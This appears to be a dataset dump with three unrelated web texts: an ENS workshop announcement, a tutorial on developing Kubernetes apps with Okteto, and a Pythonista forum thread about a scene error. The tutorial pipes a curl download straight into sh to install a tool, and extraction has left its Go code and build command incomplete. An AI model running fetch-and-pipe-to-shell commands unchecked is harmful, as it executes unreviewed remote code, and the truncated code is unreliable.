text
stringlengths
454
608k
url
stringlengths
17
896
dump
stringclasses
91 values
source
stringclasses
1 value
word_count
int64
101
114k
flesch_reading_ease
float64
50
104
ENS Workshop Applications Are Now Open! **A big thanks to our sponsors Aragon and Infura for helping to make this happen!** What: Workshop to discuss the current state and future of ENS with the ENS team and others interested in the project When: October 7, 2019 (the day before Devcon5 starts), during the day Where: Near the Devcon5 conference site in Osaka, Japan (exact location will be shared with attendees closer to the event) Who: The ENS team and others interested in the development of ENS Application: CLOSED Application deadline: August 31st, 2019; we will approve applications on a rolling basis Cost: Free! But you must have your application approved to participate * * * We are pleased to announce that applications are now open for the third annual ENS workshop. The purpose of this event is to discuss the current state and future of ENS. Previous years have been a blast! You can read about last year’s workshop here. If you have been following ENS closely, engaging in discussion on our forum, and/or using ENS in an interesting way, and you want to help influence the future of the project, this is for you. This is not an event for new users/developers to learn about ENS. As such, we’d like to limit participants to those able to contribute the most to discussions, hence the need for an application. Only those whose applications are accepted can participate. If you’d like to bring a friend or colleague, they must also submit an application and be approved. Discussion topics may include things like cross-chain support, use of renewal fees, integration with DNS, and ENS’s relationship to the global namespace. But on your application, please tell us what you would like to discuss. There is no cost to participants, and you will receive free food and some fun ENS swag. We look forward to seeing you!
https://medium.com/the-ethereum-name-service/ens-workshop-applications-are-now-open-f46db6c63384?utm_campaign=Decentral%20Cafe&utm_medium=email&utm_source=Revue%20newsletter
CC-MAIN-2019-43
refinedweb
317
60.24
Tutorial How To Develop Applications on Kubernetes with Okteto The author selected Girls Who Code to receive a donation as part of the Write for DOnations program. Introduction The Okteto CLI is an open-source project that provides a local development experience for applications running on Kubernetes. With it you can write your code on your local IDE and as soon as you save a file, the changes can be pushed to your Kubernetes cluster and your app will immediately update. This whole process happens without the need to build Docker images or apply Kubernetes manifests, which can take considerable time. In this tutorial, you’ll use Okteto to improve your productivity when developing a Kubernetes-native application. First, you’ll create a Kubernetes cluster and use it to run a standard “Hello World” application. Then you’ll use Okteto to develop and automatically update your application without having to install anything locally. Prerequisites Before you begin this tutorial, you’ll need the following: - A Kubernetes 1.12+ cluster. In this tutorial, the setup will use a DigitalOcean Kubernetes cluster with three nodes, but you are free to create a cluster using another method. kubectland doctlinstalled and configured to communicate with your cluster. - A Docker Hub account - Docker running on your local machine. Step 1 — Creating the Hello World Application The “Hello World” program is a time-honored tradition in web development. In this case, it is a simple web service that responds “Hello World” to every request. Now that you’ve created your Kubernetes cluster, let’s create a “Hello World” app in Golang and the manifests that you’ll use to deploy it on Kubernetes. First change to your home directory: - cd ~ Now make a new directory called hello_world and move inside it: - mkdir hello_world - cd hello_world Create and open a new file under the name main.go with your favorite IDE or text editor: - nano main.go main.go will be a Golang web server that returns the message Hello world!. So, let’s use the following code:!") } The code in main.go does the following: - The first statement in a Go source file must be the packagename. Executable commands must always use package main. - The importsection indicates which packages the code depends on. In this case it uses fmtfor string manipulation, and net/httpfor the HTTP server. - The mainfunction is the entry point to your binary. The http.HandleFuncmethod is used to configure the server to call the helloServerfunction when a request to the /path is received. http.ListenAndServestarts an HTTP server that listens on all network interfaces on port 8080. - The helloServerfunction contains the logic of your request handler. In this case, it will write Hello world!as the response to the request. You need to create a Docker image and push it to your Docker registry so that Kubernetes can pull it and then run the application. Open a new file under the name Dockerfile with your favorite IDE or text editor: - nano Dockerfile The Dockerfile will contain the commands required to build your application’s Docker container. Let’s use the following code: FROM golang:alpine as builder RUN apk --update --no-cache add bash WORKDIR /app ADD . . RUN go build -o app FROM alpine as prod WORKDIR /app COPY --from=builder /app/app /app/app EXPOSE 8080 CMD ["./app"] The Dockerfile contains two stages, builder and prod: - The builderstage contains the Go build tools. It’s responsible for copying the files and building the Go binary. - The prodstage is the final image. It will contain only a stripped down OS and the application binary. This is a good practice to follow. It makes your production containers smaller and safer since they only contain your application and exactly what is needed to run it. Build the container image (replace your_DockerHub_username with your Docker Hub username): - docker build -t your_DockerHub_username/hello-world:latest Now push it to Docker Hub: - docker push your_DockerHub_username/hello-world:latest Next, create a new folder for the Kubernetes manifests: - mkdir k8s When you use a Kubernetes manifest, you tell Kubernetes how you want your application to run. This time, you’ll create a deployment object. So, create a new file deployment.yaml with your favorite IDE or text editor: - nano k8s/deployment.yaml The following content describes a Kubernetes deployment object that runs the okteto/hello-world:latest Docker image. Add this content to your new file, but in your case replace okteto listed after the image label with your_DockerHub_username: apiVersion: apps/v1 kind: Deployment metadata: name: hello-world spec: selector: matchLabels: app: hello-world replicas: 1 template: metadata: labels: app: hello-world spec: containers: - name: hello-world image: your_DockerHub_username/hello-world:latest ports: - containerPort: 8080 The deployment manifest has three main sections: metadatadefines the name for your deployment. replicasdefines how many copies of it you want running. templatetells Kubernetes what to deploy, and what labels to add. In this case, a single container, with the okteto/hello-world:latestimage, listening on port 8080, and with the app: hello-worldlabel. Note that this label is the same used in the selectorsection. You’ll now need a way to access your application. You can expose an application on Kubernetes by creating a service object. Let’s continue using manifests to do that. Create a new file called service.yaml with your favorite IDE or text editor: - nano k8s/service.yaml The following content describes a service that exposes the hello-world deployment object, which under the hood will use a DigitalOcean Load Balancer: apiVersion: v1 kind: Service metadata: name: hello-world spec: type: LoadBalancer ports: - protocol: TCP port: 80 targetPort: 8080 name: http selector: app: hello-world The service manifest has four main sections: metadatatells Kubernetes how to name your service. typetells Kubernetes how you want to expose your service. In this case, it will expose it externally through a Digital Ocean Load Balancer. - The portslabel tells Kubernetes which ports you want to expose, and how to map them to your deployment. In this case, you will expose port 80externally and direct it to port 8080in your deployment. selectortells Kubernetes how to direct traffic. In this case, any pod with the app: hello-worldlabel will receive traffic. You now have everything ready to deploy your “Hello World” application on Kubernetes. We will do this next. Step 2 — Deploying Your Hello World Application In this step you’ll deploy your “Hello World” application on Kubernetes, and then you’ll validate that it is working correctly. Start by deploying your application on Kubernetes: - kubectl apply -f k8s You’ll see the following output: Outputdeployment.apps "hello-world" created service "hello-world" created After about one minute or so, you will be able to retrieve your application’s IP. Use this kubectl command to check your service: - kubectl get service hello-world You’ll see an output like this listing your Kubernetes service objects. Note your application’s IP in the the EXTERNAL-IP column: OutputNAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE hello-world ClusterIP your_cluster_ip your_external_ip 8080/TCP 37s Open your browser and go to your_external_ip listed for your “Hello World” application. Confirm that your application is up and running before continuing with the next step. Until this moment, you’ve followed a fairly traditional pathway for developing applications with Kubernetes. Moving forward, whenever you want to change the code in your application, you’ll have to build and push a new Docker image, and then pull that image from Kubernetes. This process can take quite some time. Okteto was designed to streamline this development inner-loop. Let’s look at the Okteto CLI and see just how it can help. Step 3 — Installing the Okteto CLI You will now improve your Kubernetes development productivity by installing the Okteto CLI. The Okteto command line interface is an open-source project that lets you synchronize application code changes to an application running on Kubernetes. You can continue using your favorite IDE, debuggers, or compilers without having to commit, build, push, or redeploy containers to test your application–as you did in the previous steps. To install the Okteto CLI on a macOS or Linux machine, run the following command: - curl -sSfL | sh Let’s take a closer look at this command: - The curlcommand is used to transfer data to and from a server. - The -sflag suppresses any output. - The -Sflag shows errors. - The -fflag causes the request to fail on HTTP errors. - The -Lflag makes the request follow redirects. - The |operator pipes this output to the shcommand, which will download and install the latest oktetobinary in your local machine. If you are running Windows, you can alternately download the file through your web browser and manually add it to your $PATH. Once the Okteto CLI is installed, you are ready to put your “Hello World” application in development mode. Step 4 — Putting Your Hello World Application in Development Mode The Okteto CLI is designed to swap the application running on a Kubernetes cluster with the code you have in your machine. To do so, Okteto uses the information provided from an Okteto manifest file. This file declares the Kubernetes deployment object that will swap with your local code. Create a new file called okteto.yaml with your favorite IDE or text editor: - nano okteto.yaml Let’s write a basic manifest where you define the deployment object name, the Docker base image to use, and a shell. We will return to this information later. Use the following sample content file: name: hello-world image: okteto/golang:1 workdir: /app command: ["bash"] Prepare to put your application in development mode by running the following command: - okteto up Output✓ Development environment activated ✓ Files synchronized Namespace: default Name: hello-world Welcome to your development environment. Happy coding! default:hello-world /app> The okteto up command swaps the “Hello World” application into a development environment, which means: The Hello World application container is updated with the docker image okteto/golang:1. This image contains the required dev tools to build, test, debug, and run the “Hello World” application. A file synchronization service is created to keep your changes up-to-date between your local filesystem and your application pods. A remote shell starts in your development environment. Now you can build, test, and run your application as if you were in your local machine. Whatever process you run in the remote shell will get the same incoming traffic, the same environment variables, volumes, or secrets as the original “Hello World” application pods. This, in turn, gives you a highly realistic, production-like development environment. In the same console, now run the application as you would typically do (without building and pushing a Docker image), like this: - go run main.go OutputStarting hello-world server... The first time you run the application, Go will download your dependencies and compile your application. Wait for this process to finish and test your application by opening your browser and refreshing the page of your application, just as you did previously. Now you are ready to begin developing directly on Kubernetes. Step 5 — Developing Directly on Kubernetes Let’s start making changes to the “Hello World” application and then see how these changes get reflected in Kubernetes. Open the main.go file with your favorite IDE or text editor. For example, open a separate console and run the following command: - nano main.go Then, change your response message to Hello world from DigitalOcean!: from DigitalOcean!") } It is here that your workflow changes. Instead of building images and redeploying containers to update the “Hello World” application, Okteto will synchronize your changes to your development environment on Kubernetes. From the console where you executed the okteto up command, cancel the execution of go run main.go by pressing CTRL + C. Now rerun the application: - default:hello-world /app> go run main.go OutputStarting hello-world server... Go back to the browser and reload the page for your “Hello World” application. Your code changes were applied instantly to Kubernetes, and all without requiring any commits, builds, or pushes. Conclusion Okteto transforms your Kubernetes cluster into a fully-featured development platform with the click of a button. In this tutorial you installed and configured the Okteto CLI to iterate your code changes directly on Kubernetes as fast as you can type code. Now you can head over to the Okteto samples repository to see how to use Okteto with different programming languages and debuggers. Also, if you share a Kubernetes cluster with your team, consider giving each member access to a secure Kubernetes namespace, configured to be isolated from other developers working on the same cluster. This great functionality is also provided by the Okteto App in the DigitalOcean Kubernetes Marketplace.
https://www.digitalocean.com/community/tutorials/how-to-develop-applications-on-kubernetes-with-okteto
CC-MAIN-2020-40
refinedweb
2,127
54.83
Linux Software › Search › type xwin Tag «type xwin»: downloads Search results for «type xwin»: Tmxxine 0.7 by Tmxxine Team Tmxxine is a linux distribution based on Puppy Linux 2.01. Here are some key features of "Tmxxine": All standard puppy software included: WP, Spreadsheet, Browser, editors, painting, vector editor, email, ftp, chat etc Voice Synthesis At the moment the Operating system is not singing to you b…… Data::Type::Docs 0.01.15 by Murat Uenalan Data::Type::Docs is a Perl module with the manual overview. MANUALS Data::Type::Docs::FAQ Frequently asked questions. Data::Type::Docs::FOP Frequently occuring problems. Data::Type::Docs::Howto Point to point recipes how to get things done. Data::Type::Docs::RFC Exact API… Type Explorer 0.2 by Muthiah Annamalai Texplore : Type Explorer for GObject based Libraries. You can see widget hierarchy, class, type relations, signals etc using this software, for any GObject based class, or library using it. What's New in This Release: Fixed lots of bugs in correctness. Functionally correct. Added flags…… Imager::Filters 0.54 by Arnar M. Hrafnkelsson and Tony Cook di… File type determination 0.9 by jah File type determination is a little KDE Service Menu that calls the GNU 'file' command to retrieve Mime information from files, and presents it inside a standard KDE dialog. Requirements: KDE… TCLP 0.4.4 by Emmanuel Coquery TCLP is a prescriptive type system for Constraint Logic Programming, currently: ISO-Prolog GNU-Prolog Sicstus Prolog and its libraries Contraints programming libraries of Sicstus Prolog Based on Typing Constraint Logic Programs by Fran?ois Fages and Emmanuel Coquery. Journal of Theory and… Object::Relation::Meta::Type 0.1.0 by Kineticode, Inc. Object::Relation::Meta::Type is an Object::Relation Data type validation and accessor building. Synopsis Object::Relation::Meta::Type->add( key => "state", name => "State", builder => 'Object::Relation::Meta::AccessorBuilder', raw => sub { ref $_[0] ? s… fid-listbuffer 0.1.3 by Jon Cast… Palm::Progect::Converter::Text 2.0.4 by Michael Graham Palm::Progect::Converter::Text is a Perl module to convert between Progect databases and Text files. SYNOPSIS my $converter = Palm::Progect::Converter->new( format => 'Text', # ... other args ... ); $converter->load_records(); # ... do stuff with record… Bio::Graphics::Feature 1.4 by Lincoln Stein Bio::Graphics::Feature is a simple feature object for use with Bio::Graphics::Panel. SYNOPSIS use Bio::Graphics::Feature; # create a simple feature with no internal structure $f = Bio::Graphics::Feature->new(-start => 1000, -stop => 2000, … wmfortune 0.241 by Makoto SUGANO wmfortune is a dock-app that shows you forune messages. Installation: Before installation. Make sure fortune command is in your path. To compile and install wmfortune. (1) Edit Makefile as you like. (2) Type "make" (3) Then type "make install" To uninstall. …… Texplore 0.2 by Muthiah Annamalai. Insta… PLplot 5.6.1 by Alan W. Irwin…… FileType 0.1.3 by Paul L Daniels File commercia… Turnracer Build 1 by ATD Turnracer is an free TBS racer game for GNU/Linux and other UNIX look-alikes. The rules of Turnracer aren't easy. Turnracer is written in C, and Gtk2 based. There is not yet an AI in the game, but it is planed for one of the next releases. Installation: 1. Make sure you have install tar a… gconfmm 2.16.0 by Murray Cumming gconfmm are C++ wrappers for GConf. All classes are in the Gnome::Conf namespace. Installation: The simplest way to compile this package is: 1. `cd' to the directory containing the package's source code and type `./configure' to configure the package for your system. If you're using `c
http://nixbit.com/search/type-xwin/
CC-MAIN-2015-40
refinedweb
606
52.56
Opened 5 years ago Closed 5 years ago #19543 closed Bug (fixed) SimpleLazyObject missing __repr__ proxy Description SimpleLazyObject (from django.utils.functionals) does not proxy _repr_ method. Use Case: User.__unicode__ -> print data for user, example: "user@email.com" User.__repr__ -> print debugging data, example: "<User pk:1, email:user@email.com, points:123>" _unicode_ is used by most of application to render user content so I cant override it to using at logging. _repr_ is used in logging. Example user message: "Hi %s"%request.user Example logging message: "%r just logged in"%request.user When user is wrapped with SimpleLazyObject _repr_ method of User is not called. My idea is to make it available like SimpleLazyObject._repr_ = lambda self: '<SimpleLazyObject: %r>'%self._wrapped Patch: --- a/django/utils/functional.py +++ b/django/utils/functional.py @@ -303,6 +303,9 @@ class SimpleLazyObject(LazyObject): def __reduce__(self): return (self.__newobj__, (self.__class__,), self.__getstate__()) + def __repr__(self): + return '<SimpleLazyObject: %r>' % self._wrapped + # Need to pretend to be the wrapped class, for the sake of objects that care # about this (especially in equality tests) __class__ = property(new_method_proxy(operator.attrgetter("__class__"))) Attachments (1) Change History (7) comment:1 Changed 5 years ago by comment:2 Changed 5 years ago by After some further discussion about the value in debugging the following is now suggested: Do show in __repr__ that we are a lazy object check whether the lazy object has been evaluated if not evaluated, include the repr of the setup function as the wrapped content - so that lazy objects are not evaluated at the time of repr call otherwise wrap the target instances __repr__ method as proposed. Changed 5 years ago by implemented repr and updated test comment:3 Changed 5 years ago by the Github branch is comment:4 Changed 5 years ago by Looks good! comment:5 Changed 5 years ago by forgot to link the github pull request: Since a lazy object represents itself as the target class - it should try to be that class as much as possible, and not try to be "something special" even though it is. So repr should just proxy like other magic methods on the class. Accepting the ticket based on the fact that we should do something explicit for repr, but rejecting the wrapped result.
https://code.djangoproject.com/ticket/19543?cversion=0&cnum_hist=1
CC-MAIN-2018-22
refinedweb
382
55.13
The source code of this article is based on JDK13 SynchronousQueue Official annotation translation For the implementation of a blocking queue, its insertion operation must wait for the corresponding removal operation. Vice versa A synchronization queue has no internal capacity limit - The peek() operation cannot be performed, so the element exists only when you try to remove it - You cannot use any method to insert an element when there are no other threads waiting to be removed - The iteration operation cannot be performed because no element can be iterated The queue header element is the first write thread to attempt to add an element; If there is no waiting write thread, no element can be removed, and the poll method will return null If SynchronousQueue is viewed from a collection perspective, it is an empty collection. This queue also does not accept null elements Synchronization queue is like a merge channel. Things running in one thread must synchronously wait for transactions running in another thread to process some information, such as events, tasks, etc This class supports optional fair policies. By default, there is no guarantee. If the fair policy is specified in the constructor, the order of thread access will be FIFO This class is also part of the Java collection framework Source code definition public class SynchronousQueue<E> extends AbstractQueue<E> implements BlockingQueue<E>, java.io.Serializable { It inherits AbstractQueue and BlockingQueue, so it is a blocking queue attribute // Class responsible for transmission private transient volatile Transferer<E> transferer; // Queue lock private ReentrantLock qlock; // Producer waiting queue private WaitQueue waitingProducers; // Consumer's waiting queue private WaitQueue waitingConsumers; There are four attributes in total. Except for one reentrant lock, the others are internal implementation classes. Take a look in turn Transferer // Abstract class, which defines the behavior of transmission. Its implementation class is shown below abstract static class Transferer<E> { abstract E transfer(E e, boolean timed, long nanos); } TransferStack stack The head node of the stack is saved internally: head volatile SNode head; This SNode is also an internal class, which is relatively simple static final class SNode { volatile SNode next; // next node in stack volatile SNode match; // the node matched to this volatile Thread waiter; // to control park/unpark Object item; // data; or null for REQUESTs int mode; } It saves the value of the current node, the next node, and the node matching the current node At the same time, the waiting thread is saved for blocking and waking up The implementation of TransferStack stack for transfer is as follows: @SuppressWarnings("unchecked") E transfer(E e, boolean timed, long nanos) { SNode s = null; // constructed/reused as needed // Is the type of current request producer or consumer int mode = (e == null) ? REQUEST : DATA; // spin for (;;) { SNode h = head; // If the current stack is empty, or the type of the first element of the stack is different from the current type if (h == null || h.mode == mode) { // empty or same-mode // Timeout if (timed && nanos <= 0L) { // can't wait // The header node has timed out. Pop up the header node and let the next node become the header node if (h != null && h.isCancelled()) casHead(h, h.next); // pop cancelled node else // Timeout, but the header node is empty, or the header node has not been cancelled, it returns empty return null; } else if (casHead(h, s = snode(s, e, h, mode))) { // Update the header node to the current node // Then block and wait for matching operation SNode m = awaitFulfill(s, timed, nanos); // If the returned m is a header node, it means that it is cancelled and null is returned if (m == s) { // wait was cancelled clean(s); return null; } // If the head node is not empty and the next node is s if ((h = head) != null && h.next == s) casHead(h, s.next); // help s's fulfiller // Return the item that matches successfully return (E) ((mode == REQUEST) ? m.item : s.item); } } else if (!isFulfilling(h.mode)) { // try to fulfill no matching in progress // Check whether the header node is cancelled if (h.isCancelled()) // already cancelled casHead(h, h.next); // pop and retry // Set the current node as the head node else if (casHead(h, s=snode(s, e, h, FULFILLING|mode))) { // Wait for the match to succeed for (;;) { // loop until matched or waiters disappear SNode m = s.next; // m is s's match if (m == null) { // all waiters are gone casHead(s, null); // pop fulfill node s = null; // use new node next time break; // restart main loop } SNode mn = m.next; if (m.tryMatch(s)) { casHead(s, mn); // pop both s and m return (E) ((mode == REQUEST) ? m.item : s.item); } else // lost match s.casNext(m, mn); // help unlink } } } else { // help a fulfiller // Matching SNode m = h.next; // m is h's match if (m == null) // waiter is gone casHead(h, null); // pop fulfilling node else { SNode mn = m.next; if (m.tryMatch(h)) // help match casHead(h, mn); // pop both h and m else // lost match h.casNext(m, mn); // help unlink } } } } The code is complex. Try to write various branches: - The stack is empty, or the first element of the stack is consistent with the current type, either both consumers or producers - If timeout occurs: - If the first element of the stack has been cancelled, update the first element of the stack and spin again - If the element at the beginning of the stack is not cancelled or empty, it directly returns null. To end - There is no timeout. Put the current node at the top of the stack successfully. Wait for matching - Matching failed, timeout, null returned. - If the matching is successful, the corresponding element is returned - There are no matches in progress - If the first element of the stack is cancelled, pop it up and replace it with its next to continue the loop - Replace the first element of the stack with the current element, and the status is matching, successful - Spin and wait for matching. The matching is returned successfully, and the matching continues if it fails - Update failed, continue cycle - Matching is in progress to help update the stack header and next pointer TransferQueue queue The first is the node in the queue, which saves the pointer to a node, the elements of the current node, and the waiting thread //Nodes in queue static final class QNode { volatile QNode next; // next node in queue volatile Object item; // CAS'ed to or from null volatile Thread waiter; // to control park/unpark final boolean isData; } Its properties are: transient volatile QNode head; transient volatile QNode tail; transient volatile QNode cleanMe; Head and tail. @SuppressWarnings("unchecked") E transfer(E e, boolean timed, long nanos) { QNode s = null; // constructed/reused as needed boolean isData = (e != null); for (;;) { QNode t = tail; QNode h = head; if (t == null || h == null) // saw uninitialized value continue; // spin if (h == t || t.isData == isData) { // empty or same-mode QNode tn = t.next; if (t != tail) // inconsistent read continue; if (tn != null) { // lagging tail advanceTail(t, tn); continue; } if (timed && nanos <= 0L) // can't wait return null; if (s == null) s = new QNode(e, isData); if (!t.casNext(null, s)) // failed to link in continue; advanceTail(t, s); // swing tail and wait; } } } The queue matching operation is as above Still spin: - If the queue is empty, spin - If the queue is empty or all nodes are of the same type - If the tail changes, spin again - If the tail is extended backward, spin again - If the timeout occurs, null is returned. - If the current node is empty, create the current node - If you fail to set the current node as the tail of the queue, spin again - Wait for matching. If matching fails, null is returned. - If the matching is successful, the corresponding element will be returned - If the queue is not empty and is not a node of the same type - If the match is successful, the head node will leave the queue and wake up the waiting thread What is the difference between the two implementation classes? It is used to achieve fairness Construction method public SynchronousQueue() { this(false); } public SynchronousQueue(boolean fair) { transferer = fair ? new TransferQueue<E>() : new TransferStack<E>(); } If it is fair, the FIFO queue is used. If it is not fair, the stack is used Team entry method - put public void put(E e) throws InterruptedException { if (e == null) throw new NullPointerException(); if (transferer.transfer(e, false, 0) == null) { Thread.interrupted(); throw new InterruptedException(); } } Directly call the transfer method of the transferor, return if successful, or throw an exception Others are similar Out of team method public E take() throws InterruptedException { E e = transferer.transfer(null, false, 0); if (e != null) return e; Thread.interrupted(); throw new InterruptedException(); } Directly call the transfer method of the transferor, return if successful, or throw an exception Others are similar WaitQueue wait queue @SuppressWarnings("serial") static class WaitQueue implements java.io.Serializable { } static class LifoWaitQueue extends WaitQueue { private static final long serialVersionUID = -3633113410248163686L; } static class FifoWaitQueue extends WaitQueue { private static final long serialVersionUID = -3623113410248163686L; } private WaitQueue waitingProducers; private WaitQueue waitingConsumers; Wait queue and producer consumer queue are just meaningless empty classes added in JDK 1.5 for serialization summary SynchronousQueue implements a queue and a stack according to whether it is fair or not, which is used to save the producers and consumers of the current request Abstract producers and consumers into nodes in the queue or stack. After each request comes, find another type of node to match. If the match is successful, both nodes will be out of the queue. If the match fails, keep trying Reference articles End. Contact me Finally, welcome to my personal official account, Yan Yan ten, which will update many learning notes from the backend engineers. I also welcome direct official account or personal mail or email to contact me. The above are all personal thoughts. If there are any mistakes, please correct them in the comment area. Welcome to reprint, please sign and keep the original link. Contact email: huyanshi2580@gmail.com For more study notes, see personal blog or WeChat official account, Yan Yan ten > > Huyan ten
https://programmer.group/juc-series-synchronization-queue.html
CC-MAIN-2022-40
refinedweb
1,688
55.37
Introduction: How to Use an HC-SR04 Ultrasonic Sensor With Arduino This instructable will show you how to use an HC-SR04 chip with Arduino. I got a kit from GearBest that has everything in it that you will need for this project, also this kit is very good for beginners and i would recommend you check it out here You will need the fallowing parts to make this work: 1) Arduino Uno 2) HC-SR04 3) Wires Let's Begin! Step 1: Connect Everything Up HC-SR04 | UNO Vcc | 5v Gnd | Gnd Echo | 11 Trig | 12 -------------------------------------------------- That's it super easy, let's continue Step 2: Program It You will need the NewPing Library, you can Download it Here I used the sample library sketch (i also included it below) and uploaded it to my Arduino UNO #include <NewPing.h> #define TRIGGER_PIN 12 // Arduino pin tied to trigger pin on the ultrasonic sensor. #define ECHO_PIN 11 // Arduino pin tied to echo pin on the ultrasonic sensor. #define MAX_DISTANCE 200 //"); Step 3: Test It Out Open the Serial Port and test it out. You now should be done! If you have any questions leave them in the comments and i will try to help you out. Thanks for reading! Recommendations We have a be nice policy. Please be positive and constructive.
http://www.instructables.com/id/How-to-Use-an-HC-SR04-Ultrasonic-Sensor-With-Ardui/
CC-MAIN-2018-26
refinedweb
221
68.7
In the C-Sharp 3.0 a new feature Automatic property got introduced. It allows us to create a class as a bag of the setters and the getters. You can create a class as follows: public class Product { public int Price { get; set; } public string Name { get; set; } } Each property is backed by a backing filed. When you set value of the property, setter gets executed to set the value of the backing field. Now catch is that to create a read only property you have to invoke the setter in the constructor of the class and make set as private public class Product { public int Price { get; private set; } public string Name { get; set; } public Product() { Price = 10; } } In the above class definition the Price property is read only and set to the default value 10 and you can set the value of the name property outside the class. To create a read only property with the default value, we created a private setter and then set the default value in the constructor. In c-sharp 6.0, you can directly create a read only property with default value without invoking the setter. This feature of C# 6.0 is called Property Initializers Property Initializer allows you to create a property with the default value without invoking the setter. It directly sets value if the backing field. As you see in the above snippet we are setting the default value of Price property as 10. However after creating the instance of the class. Value of price property can be changed. If you wish you can create read only property by removing the setter. Since setter is optional, it is easier to create immutable properties. For your reference source code harnessing Property Initializer is given below: using System; namespace demo1 { class Program { static void Main(string[] args) { Product p = new Product { Name = "Pen" }; Console.WriteLine(p.Price); Console.ReadKey(true); } } public class Product { public int Price { get;} = 10; public string Name { get; set; } } } We can summarize this post discussing purpose of the auto property initializer. It allows us to create immutable property with the user defined default value. Now to create properties with default values, you don’t have to invoke setter. Happy coding. One thought on “Property Initializers in C-Sharp 6.0” It’s very cool, very useful
https://debugmode.net/2014/11/18/auto-property-initializers-in-c-sharp-6-0/
CC-MAIN-2017-13
refinedweb
391
63.39
/shared task on server? As I understand it, each instance of my Vaadin application is tied to a session. So each user will see an independent view of the application and data. How can I create shared data so that each user sees the same, updating, data? Specifically, I would like to have a background task on the server updating the common data. Then each user can see the updated data. One solution is to use a non-Vaadin processes to update a database. Then Vaadin just reads the DB for each client view application. But is there a simple way to share create a server-side task and share the results among the running applications? Have you considered just putting the data in a static variable (or a singleton), for example in your application class? For example: public class GasDiaryApplication extends Application { // Data is shared between user sessions static Prevayler prevayler = null; static UserBase users = new UserBase(); public void init() { ... // Initialize persistence if first instance if (prevayler == null) { try { prevayler = PrevaylerFactory.createPrevayler(users, "gasdiarydata"); } catch (IOException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } } ... Well, I'm not sure if this is the best example. You'll have to consider thread-safety, for example. Y, that's what I was just trying. Works great. I'm coding in Scala, so it was literally as easy as changing "class" to "object" for my processing class to make it a singleton. I then made it extend Actor and respond to an update message. So now the concurrency is handled by the Actor messaging. Only one update is running at a time, and the update messages can be sent asynchronously. With a little additional logic, the actor won't redo updates if they're requested too soon. It just drops the queued up messages that arrive too quickly. The result is that each client requests fresh data frequently and is given the freshest data to use, while rate-limiting the updates. Note that you must synchronize on the application if you change user interface stuff outside the request/response cycle. Otherwise strange things will occur if the user happens to interact with the application while the data is being updated. Best Regards, Marc
https://vaadin.com/forum/thread/147346/background-shared-task-on-server
CC-MAIN-2022-40
refinedweb
371
58.08
30 March 2012 09:04 [Source: ICIS news] SINGAPORE (ICIS)--?xml:namespace> The company is currently running the plant at 90% capacity, the source said. “The plant is produce non-oil grade SBR 1502 currently, we may begin to produce oil-extended SBR Fuxiang Chemical restarted its 50,000 tonne/year butadiene rubber (BR) plant at the same site on 28 March and is expected to run it at 60% capacity in April, the source said without specifying the current rate. “Poor margins may be a reason for Fuxiang Chemical to reduce SBR and BR production in April because the [high] prices of butadiene (BD), a feedstock of SBR and BR,” an industry source said. BD prices were assessed at yuan (CNY) 26,000/tonne ($4,127/tonne) ex-tank Yangtze, while non-oil grade SBR was assessed at CNY23,500-24,300/tonne EXWH (ex-warehouse) east China, according to data from Chemease, an ICIS service in China on 29 March. BR was assessed at CNY27,800-28,300/tonne EXWH east “Compared with BD prices, non-oil grade SBR 1502 and BR should be priced at above CNY25,000/tonne and CNY30,000/tonne, respectively, to ensure margins for makers,” the source added. (
http://www.icis.com/Articles/2012/03/30/9546173/chinas-fuxiang-chemical-to-drop-operating-rates-at-sbr-plant-in.html
CC-MAIN-2013-48
refinedweb
205
58.25
What this error Traceback (most recent call last): File "/var/containers/Bundle/Application/F3A42D55-5CB1-4DC2-AFF5-5BE7BB053375/Pythonista3.app/Frameworks/Py3Kit.framework/pylib/site-packages/scene.py", line 161, in _setup_scene self.setup() File "/private/var/mobile/Library/Mobile Documents/iCloud~com~omz-software~Pythonista3/Documents/PPEasy/PPEasy.py", line 11, in setup self.present_modal_scene(Lvl_1()) File "/var/containers/Bundle/Application/F3A42D55-5CB1-4DC2-AFF5-5BE7BB053375/Pythonista3.app/Frameworks/Py3Kit.framework/pylib/site-packages/scene.py", line 125, in present_modal_scene other_scene.z_position = max(n.z_position for n in self.children) + 1 ValueError: max() arg is an empty sequence from scene import * import sound import random import math A = Action class MyScene (Scene): def setup(self): self.background_color = 'white' self.present_modal_scene(Lvl_1()) def did_change_size(self): pass def update(self): pass def touch_began(self, touch): pass def touch_moved(self, touch): pass def touch_ended(self, touch): pass class Lvl_1(Scene): def setup(self): self.main_node = Node(parent=self) self.bg_color = SpriteNode(color='blue', size=self.size/2, position=(self.size.w/2, self.size.h * 80), parent=self) self.name = LabelNode('tezt', ('Arial', 30), position=(self.size.w/2, self.size.h * 40), parent=self) class Lvl_3(Scene): def setup(self): pass class K_N95(Scene): def setup(self): pass class N95(Scene): def setup(self): pass class Papr(Scene): def setup(self): pass class Gowns(Scene): def setup(self): pass class Face_Shield(Scene): def setup(self): pass class Oxy(Scene): def setup(self): pass class Alcohol(Scene): def setup(self): pass class Bleach(Scene): def setup(self): pass class Ammonia(Scene): def setup(self): pass class k_n95(Scene): def setup(self): pass if __name__ == '__main__': run(MyScene(), PORTRAIT, show_fps=False) @resserone13 it seems that the reason is that your main scene is empty @resserone13 so it works also class MyScene (Scene): def setup(self): self.background_color = 'white' self.main_node = Node(parent=self) self.present_modal_scene(Lvl_1()) @cvp right. It looks like I needed to add a node. Thanks as always. I’m Going to make a simple app real quick to explain the difference in the types of protective masks. I work at a hospital and you’d be surprised how many people are confused on which masks are for what. I’m not sure how I can actually get it into an app though. The app itself is just going to present pictures and texts. I wonder how hard it would be to package it up. @resserone13 try, the line is the line that generates the error class MyScene (Scene): def setup(self): self.background_color = 'white' try: print(max(n.z_position for n in self.children)) except Exception as e: print(e) self.main_node = Node(parent=self) print(max(n.z_position for n in self.children)) #self.present_modal_scene(Lvl_1()) @resserone13 said: Going to make a simple app real quick to explain the difference in the types of protective masks. Would like To help but Can't imagine how - resserone13 @cvp that sounds good. Once I get I done which should be in the next day or 2 I’ll post it on GitHub or the forum and let you know. It should be pretty simple. Each scene will have a title, a picture of the mask, and a description of when it should be used. I’ll let you know. This post is deleted!last edited by resserone13 I was still busy to debug, too long text... @resserone13 try self.text = 'This is a level 1 mask. \nThis mask is suitable for general\n areas such as lobbies or the cafeteria. \nIt is NOT recommended to ware a Level 1 \nwhile working with patients' weara mask, not warea mask @resserone13, for your app, this could work really well:
